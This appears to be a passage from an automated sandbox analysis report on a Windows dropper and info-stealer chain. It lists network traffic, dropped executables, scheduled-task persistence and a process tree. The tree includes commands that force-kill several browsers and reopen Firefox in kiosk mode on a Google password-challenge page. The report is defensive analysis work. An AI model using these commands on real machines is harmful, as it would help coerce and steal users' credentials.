Source: 2d569de7b1.exe, 0000000C.00000002.2989049565.0000000000F40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdf_6.0.1
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/accountservices.sync.log.logger.browserPanelUI-remotetabs-setupsyncappMenu-heade
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60575 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60632 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60649 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60561 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60603 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60626 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60637 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60566 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60606 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60609 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60573 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60615 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60638 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60559
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60558
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60557
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60609
Source: unknown Network traffic detected: HTTP traffic on port 60570 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60578 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60565
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60564
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60563
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60561
Source: unknown Network traffic detected: HTTP traffic on port 60558 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60564 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60606
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60605
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60604
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60603
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60602
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60568
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60600
Source: unknown Network traffic detected: HTTP traffic on port 60604 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60566
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60571 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60636 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60613 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60575
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60573
Source: unknown Network traffic detected: HTTP traffic on port 60645 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60559 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60565 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60571
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60570
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60615
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60614
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60613
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60578
Source: unknown Network traffic detected: HTTP traffic on port 60633 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60620
Source: unknown Network traffic detected: HTTP traffic on port 60648 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60640 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60602 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60626
Source: unknown Network traffic detected: HTTP traffic on port 60634 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60647 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60557 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60563 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60639
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60638
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60637
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60636
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60634
Source: unknown Network traffic detected: HTTP traffic on port 60620 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60633
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60599
Source: unknown Network traffic detected: HTTP traffic on port 60605 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60632
Source: unknown Network traffic detected: HTTP traffic on port 60599 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown Network traffic detected: HTTP traffic on port 60639 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60614 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60640
Source: unknown Network traffic detected: HTTP traffic on port 60568 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60649
Source: unknown Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60648
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60647
Source: unknown Network traffic detected: HTTP traffic on port 60600 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60645
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49988 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49993 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:60559 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:60565 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:60568 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:60573 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:60605 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:60606 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:60609 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:60638 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:60639 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:60640 version: TLS 1.2

System Summary

barindex
Source: 2d569de7b1.exe, 0000000C.00000000.2915915173.0000000000D62000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_60027c62-9
Source: 2d569de7b1.exe, 0000000C.00000000.2915915173.0000000000D62000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_83877f55-8
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: section name:
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: section name: .idata
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: section name:
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: section name:
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: section name: .rsrc
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: section name: .idata
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: section name:
Source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe.0.dr Static PE information: section name:
Source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name: .rsrc
Source: random[1].exe.8.dr Static PE information: section name: .idata
Source: 976d9f40c1.exe.8.dr Static PE information: section name:
Source: 976d9f40c1.exe.8.dr Static PE information: section name: .rsrc
Source: 976d9f40c1.exe.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: .rsrc
Source: random[1].exe0.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: 606f2f6db0.exe.8.dr Static PE information: section name:
Source: 606f2f6db0.exe.8.dr Static PE information: section name: .rsrc
Source: 606f2f6db0.exe.8.dr Static PE information: section name: .idata
Source: 606f2f6db0.exe.8.dr Static PE information: section name:
Source: num[1].exe.8.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.8.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Code function: 5_2_00BBC056 5_2_00BBC056
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00FEE530 8_2_00FEE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_01022D10 8_2_01022D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_010231A8 8_2_010231A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00FE4DE0 8_2_00FE4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_01027049 8_2_01027049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_01028860 8_2_01028860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_010278BB 8_2_010278BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_01017F36 8_2_01017F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_0102779B 8_2_0102779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00FE4B30 8_2_00FE4B30
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe 27E4A3627D7DF2B22189DD4BEBC559AE1986D49A8F4E35980B428FADB66CF23D
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9994778774752475
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: Section: ZLIB complexity 0.9977275630108992
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: Section: ptpgbbgo ZLIB complexity 0.9942102758172363
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: Section: njaoxwad ZLIB complexity 0.9948439896472393
Source: skotes.exe.3.dr Static PE information: Section: ZLIB complexity 0.9977275630108992
Source: skotes.exe.3.dr Static PE information: Section: ptpgbbgo ZLIB complexity 0.9942102758172363
Source: random[1].exe.8.dr Static PE information: Section: ZLIB complexity 0.9994778774752475
Source: 976d9f40c1.exe.8.dr Static PE information: Section: ZLIB complexity 0.9994778774752475
Source: random[1].exe0.8.dr Static PE information: Section: njaoxwad ZLIB complexity 0.9948439896472393
Source: 606f2f6db0.exe.8.dr Static PE information: Section: njaoxwad ZLIB complexity 0.9948439896472393
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 606f2f6db0.exe.8.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe0.8.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2319704443.00000000002D1000.00000040.00000001.01000000.00000007.sdmp, 7RNKVR1EZ552XQ73.exe, 00000004.00000003.2279367623.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, 606f2f6db0.exe, 0000000A.00000003.2884674962.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, 606f2f6db0.exe, 0000000A.00000002.2934932135.00000000000E1000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@71/26@91/12
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Code function: 5_2_047B15D0 ChangeServiceConfigA, 5_2_047B15D0
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\33ORRB19.htm Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3724:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2636:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1644:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000003.2108201890.00000000059A0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120732825.0000000005A93000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 42%
Source: S14AV77TIR9DRWSCWIW0.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 7RNKVR1EZ552XQ73.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe "C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe "C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe "C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe"
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe "C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe "C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe "C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe "C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe"
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2184 -parentBuildID 20230927232528 -prefsHandle 2132 -prefMapHandle 2128 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b40077cd-dd11-4133-b7ff-87ccb7cbcf33} 7456 "\\.\pipe\gecko-crash-server-pipe.7456" 1378e86ed10 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe "C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000979001\num.exe "C:\Users\user\AppData\Local\Temp\1000979001\num.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2948 -parentBuildID 20230927232528 -prefsHandle 4268 -prefMapHandle 3212 -prefsLen 30974 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0ae1ecd2-7e69-4001-87b4-63ef548d530a} 7456 "\\.\pipe\gecko-crash-server-pipe.7456" 1379e087210 rdd
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe "C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe"
